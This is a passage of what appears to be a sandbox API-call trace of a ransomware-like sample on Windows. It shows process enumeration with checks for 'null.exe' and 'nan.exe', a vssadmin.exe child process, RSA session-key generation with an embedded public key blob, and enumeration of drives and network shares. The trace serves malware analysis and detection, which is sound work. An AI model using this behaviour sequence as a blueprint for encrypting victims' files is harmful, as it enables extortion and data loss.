th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.284] lstrcmpW (lpString1="wininit.exe", lpString2="null.exe") returned 1 [0040.284] lstrcmpW (lpString1="wininit.exe", lpString2="nan.exe") returned 1 [0040.284] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.285] lstrcmpW (lpString1="csrss.exe", lpString2="null.exe") returned -1 [0040.285] lstrcmpW (lpString1="csrss.exe", lpString2="nan.exe") returned -1 [0040.285] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.285] lstrcmpW (lpString1="winlogon.exe", lpString2="null.exe") returned 1 [0040.285] lstrcmpW (lpString1="winlogon.exe", lpString2="nan.exe") returned 1 [0040.285] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.286] lstrcmpW (lpString1="services.exe", lpString2="null.exe") returned 1 [0040.286] lstrcmpW (lpString1="services.exe", lpString2="nan.exe") returned 1 [0040.286] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.286] lstrcmpW (lpString1="lsass.exe", lpString2="null.exe") returned -1 [0040.286] lstrcmpW (lpString1="lsass.exe", lpString2="nan.exe") returned -1 [0040.286] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.286] lstrcmpW (lpString1="lsm.exe", lpString2="null.exe") returned -1 [0040.287] lstrcmpW (lpString1="lsm.exe", lpString2="nan.exe") returned -1 [0040.287] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.287] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.287] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.287] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.288] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.288] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.288] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.289] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.289] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.289] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.289] lstrcmpW (lpString1="audiodg.exe", lpString2="null.exe") returned -1 [0040.289] lstrcmpW (lpString1="audiodg.exe", lpString2="nan.exe") returned -1 [0040.289] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.290] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.290] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.290] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x310, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.291] lstrcmpW (lpString1="dwm.exe", lpString2="null.exe") returned -1 [0040.291] lstrcmpW (lpString1="dwm.exe", lpString2="nan.exe") returned -1 [0040.291] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x44c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.291] lstrcmpW (lpString1="explorer.exe", lpString2="null.exe") returned -1 [0040.291] lstrcmpW (lpString1="explorer.exe", lpString2="nan.exe") returned -1 [0040.291] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.292] lstrcmpW (lpString1="spoolsv.exe", lpString2="null.exe") returned 1 [0040.292] lstrcmpW (lpString1="spoolsv.exe", lpString2="nan.exe") returned 1 [0040.292] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.293] lstrcmpW (lpString1="taskhost.exe", lpString2="null.exe") returned 1 [0040.293] lstrcmpW (lpString1="taskhost.exe", lpString2="nan.exe") returned 1 [0040.293] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.293] lstrcmpW (lpString1="svchost.exe", lpString2="null.exe") returned 1 [0040.293] lstrcmpW (lpString1="svchost.exe", lpString2="nan.exe") returned 1 [0040.293] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x350, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.294] lstrcmpW (lpString1="taskeng.exe", lpString2="null.exe") returned 1 [0040.294] lstrcmpW (lpString1="taskeng.exe", lpString2="nan.exe") returned 1 [0040.294] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.294] lstrcmpW (lpString1="taskhost.exe", lpString2="null.exe") returned 1 [0040.294] lstrcmpW (lpString1="taskhost.exe", lpString2="nan.exe") returned 1 [0040.294] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="notificationvariancefloor.exe")) returned 1 [0040.295] lstrcmpW (lpString1="notificationvariancefloor.exe", lpString2="null.exe") returned -1 [0040.295] lstrcmpW (lpString1="notificationvariancefloor.exe", lpString2="nan.exe") returned 1 [0040.295] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="contribution gratis.exe")) returned 1 [0040.295] lstrcmpW (lpString1="contribution gratis.exe", lpString2="null.exe") returned -1 [0040.295] lstrcmpW (lpString1="contribution gratis.exe", lpString2="nan.exe") returned -1 [0040.295] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="supports.exe")) returned 1 [0040.296] lstrcmpW (lpString1="supports.exe", lpString2="null.exe") returned 1 [0040.296] lstrcmpW (lpString1="supports.exe", lpString2="nan.exe") returned 1 [0040.296] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fail.exe")) returned 1 [0040.296] lstrcmpW (lpString1="fail.exe", lpString2="null.exe") returned -1 [0040.296] lstrcmpW (lpString1="fail.exe", lpString2="nan.exe") returned -1 [0040.296] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="wind_fax.exe")) returned 1 [0040.297] lstrcmpW (lpString1="wind_fax.exe", lpString2="null.exe") returned 1 [0040.297] lstrcmpW (lpString1="wind_fax.exe", lpString2="nan.exe") returned 1 [0040.297] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="democrat.exe")) returned 1 [0040.297] lstrcmpW (lpString1="democrat.exe", lpString2="null.exe") returned -1 [0040.297] lstrcmpW (lpString1="democrat.exe", lpString2="nan.exe") returned -1 [0040.297] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="firm_village_specializing.exe")) returned 1 [0040.298] lstrcmpW (lpString1="firm_village_specializing.exe", lpString2="null.exe") returned -1 [0040.298] lstrcmpW (lpString1="firm_village_specializing.exe", lpString2="nan.exe") returned -1 [0040.298] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="bishop flesh anyway.exe")) returned 1 [0040.298] lstrcmpW (lpString1="bishop flesh anyway.exe", lpString2="null.exe") returned -1 [0040.298] lstrcmpW (lpString1="bishop flesh anyway.exe", lpString2="nan.exe") returned -1 [0040.298] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="gather-contact-chess.exe")) returned 1 [0040.299] lstrcmpW (lpString1="gather-contact-chess.exe", lpString2="null.exe") returned -1 [0040.299] lstrcmpW (lpString1="gather-contact-chess.exe", lpString2="nan.exe") returned -1 [0040.299] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="newport_offices.exe")) returned 1 [0040.299] lstrcmpW (lpString1="newport_offices.exe", lpString2="null.exe") returned -1 [0040.299] lstrcmpW (lpString1="newport_offices.exe", lpString2="nan.exe") returned 1 [0040.299] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="afterwardsbeginning.exe")) returned 1 [0040.300] lstrcmpW (lpString1="afterwardsbeginning.exe", lpString2="null.exe") returned -1 [0040.300] lstrcmpW (lpString1="afterwardsbeginning.exe", lpString2="nan.exe") returned -1 [0040.300] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="magnet.exe")) returned 1 [0040.300] lstrcmpW (lpString1="magnet.exe", lpString2="null.exe") returned -1 [0040.300] lstrcmpW (lpString1="magnet.exe", lpString2="nan.exe") returned -1 [0040.300] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mitar.exe")) returned 1 [0040.301] lstrcmpW (lpString1="mitar.exe", lpString2="null.exe") returned -1 [0040.301] lstrcmpW (lpString1="mitar.exe", lpString2="nan.exe") returned -1 [0040.301] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="alone.exe")) returned 1 [0040.301] lstrcmpW (lpString1="alone.exe", lpString2="null.exe") returned -1 [0040.301] lstrcmpW (lpString1="alone.exe", lpString2="nan.exe") returned -1 [0040.301] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="station.exe")) returned 1 [0040.302] lstrcmpW (lpString1="station.exe", lpString2="null.exe") returned 1 [0040.302] lstrcmpW (lpString1="station.exe", lpString2="nan.exe") returned 1 [0040.302] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="recorded_draws_india.exe")) returned 1 [0040.302] lstrcmpW (lpString1="recorded_draws_india.exe", lpString2="null.exe") returned 1 [0040.302] lstrcmpW (lpString1="recorded_draws_india.exe", lpString2="nan.exe") returned 1 [0040.302] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="netscape industry or.exe")) returned 1 [0040.303] lstrcmpW (lpString1="netscape industry or.exe", lpString2="null.exe") returned -1 [0040.303] lstrcmpW (lpString1="netscape industry or.exe", lpString2="nan.exe") returned 1 [0040.303] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x750, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="monteangelessyracuse.exe")) returned 1 [0040.303] lstrcmpW (lpString1="monteangelessyracuse.exe", lpString2="null.exe") returned -1 [0040.303] lstrcmpW (lpString1="monteangelessyracuse.exe", lpString2="nan.exe") returned -1 [0040.303] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="creative-worse-specially.exe")) returned 1 [0040.304] lstrcmpW (lpString1="creative-worse-specially.exe", lpString2="null.exe") returned -1 [0040.304] lstrcmpW (lpString1="creative-worse-specially.exe", lpString2="nan.exe") returned -1 [0040.304] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="elements.exe")) returned 1 [0040.304] lstrcmpW (lpString1="elements.exe", lpString2="null.exe") returned -1 [0040.304] lstrcmpW (lpString1="elements.exe", lpString2="nan.exe") returned -1 [0040.304] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="nottingham_improve_bird.exe")) returned 1 [0040.305] lstrcmpW (lpString1="nottingham_improve_bird.exe", lpString2="null.exe") returned -1 [0040.305] lstrcmpW (lpString1="nottingham_improve_bird.exe", lpString2="nan.exe") returned 1 [0040.305] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement childrens bracelet.exe")) returned 1 [0040.305] lstrcmpW (lpString1="movement childrens bracelet.exe", lpString2="null.exe") returned -1 [0040.305] lstrcmpW (lpString1="movement childrens bracelet.exe", lpString2="nan.exe") returned -1 [0040.305] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="null.exe") returned -1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="nan.exe") returned -1 [0040.306] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="null.exe") returned -1 [0040.306] lstrcmpW (lpString1="dllhost.exe", lpString2="nan.exe") returned -1 [0040.306] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mudpcd.exe")) returned 1 [0040.307] lstrcmpW (lpString1="mudpcd.exe", lpString2="null.exe") returned -1 [0040.307] lstrcmpW (lpString1="mudpcd.exe", lpString2="nan.exe") returned -1 [0040.307] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x97c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0040.307] lstrcmpW (lpString1="vssadmin.exe", lpString2="null.exe") returned 1 [0040.307] lstrcmpW (lpString1="vssadmin.exe", lpString2="nan.exe") returned 1 [0040.307] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x97c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0040.308] CloseHandle (hObject=0x84) returned 1 [0040.308] CryptAcquireContextW (in: phProv=0x16fadc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x16fadc*=0x444d38) returned 1 [0041.994] CryptGenKey (in: hProv=0x444d38, Algid=0xa400, dwFlags=0x1800001, phKey=0x16f864 | out: phKey=0x16f864*=0x444cf8) returned 1 [0042.439] CryptExportKey (in: hKey=0x444cf8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4470b8, pdwDataLen=0x16f868 | out: pbData=0x4470b8*, pdwDataLen=0x16f868*=0x44) returned 1 [0042.439] CryptExportKey (in: hKey=0x444cf8, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x4470b8, pdwDataLen=0x16f868 | out: pbData=0x4470b8*, pdwDataLen=0x16f868*=0xec) returned 1 [0042.439] CryptDestroyKey (hKey=0x444cf8) returned 1 [0042.440] CryptImportKey (in: hProv=0x444d38, pbData=0x447280, dwDataLen=0x44, hPubKey=0x0, dwFlags=0x0, phKey=0xf0301c | out: phKey=0xf0301c*=0x444cf8) returned 1 [0042.440] lstrlenA (lpString="BgIAAACkAABSU0ExABAAAAEAAQBdhB3zxFMRqfjEiGuDIG9xM7Vp1DR59046S3zxgp3zolCkaGTOEIB1o7d6TNodVMJU5P/4TaR48RqkCDPkCtpUF9WLY2eMOoZ9BJe/2brNuVMRvbHKCBqYHaJb7V76cYFdIyZDve/YL8N70hYCoJ2xZrZk2GLtBTCILIb0CFuIAu0bM5MxqyvvyHuRK6/DcULkWGbHtmhsjl5WaQ+xp0YPkIMD8Ms1q5b8TaskGO2UTe5zGwyB2SdnKajv2Rc3lNByEqTlw+NPcX3FvynUAtuRVz6cN4/rG7kQZo9omfCvCODFFYDt7au+wnVWAiTC/4nzGTtzpWSDPcjHna2KBWlufUYRIdbjgoR+0YRv587tpC0/a62F2MCTqg2LiaSvEh2n5qzfUW7K2+KmBAhAKY76a+ycEsxo/l20VYUkyrTzpvkwIhFIYuUh1wAuxqIVzaPyBlUiq8SvGMKQu1vLgta6+KyAXwffCp4rRoFKLkXeYkUR/uwucKacyJMjpN6I7ilWohImC3KvdgVnmXGLStFe37yYUGugFx0gz9CQxwQ7Q1bdQcJU2K9P87hvZQ7tSOv2u0sm0Ns0Kr5lra9CCSFDIcASin+TLIrcEnCzy1EBcThaZFfAw1e9UT8pDoctbJvVJKJs354sZjlEaYzBUkSUiNnBuTRGQyrahMPc+x9Dyw==") returned 712 [0042.440] CryptImportKey (in: hProv=0x444d38, pbData=0x447448, dwDataLen=0x214, hPubKey=0x0, dwFlags=0x0, phKey=0x16f868 | out: phKey=0x16f868*=0x4470b8) returned 1 [0042.440] CryptEncrypt (in: hKey=0x4470b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x16f888*, pdwDataLen=0x16fadc*=0xec, dwBufLen=0x200 | out: pbData=0x16f888*, pdwDataLen=0x16fadc*=0x200) returned 1 [0042.441] CryptDestroyKey (hKey=0x4470b8) returned 1 [0042.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf02b88, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x80 [0042.442] GetLogicalDrives () returned 0x4 [0042.443] wnsprintfW (in: pszDest=0x447088, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0042.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf02a25, lpParameter=0x447088, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x88 [0042.444] WaitForMultipleObjects (nCount=0x2, lpHandles=0x16f850*=0x80, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0096.135] CloseHandle (hObject=0x80) returned 1 [0096.135] CloseHandle (hObject=0x88) returned 1 [0096.135] CryptReleaseContext (hProv=0x444d38, dwFlags=0x0) returned 1 [0096.135] ExitProcess (uExitCode=0x0) Thread: id = 3 os_tid = 0x998 [0042.445] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0xedfb2c | out: lphEnum=0xedfb2c*=0x47b8f8) returned 0x0 [0046.033] WNetEnumResourceW (in: hEnum=0x47b8f8, lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28 | out: lpcCount=0xedfb24, lpBuffer=0x48ca20, lpBufferSize=0xedfb28) returned 0x0 [0046.033] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x48ca20, lphEnum=0xedfb04 | out: lphEnum=0xedfb04*=0x491980) returned 0x0 [0046.039] WNetEnumResourceW (in: hEnum=0x491980, lpcCount=0xedfafc, lpBuffer=0x494a30, lpBufferSize=0xedfb00 | out: lpcCount=0xedfafc, lpBuffer=0x494a30, lpBufferSize=0xedfb00) returned 0x103 [0046.039] WNetCloseEnum (hEnum=0x491980) returned 0x0 [0046.039] WNetOpenEnumW (in: 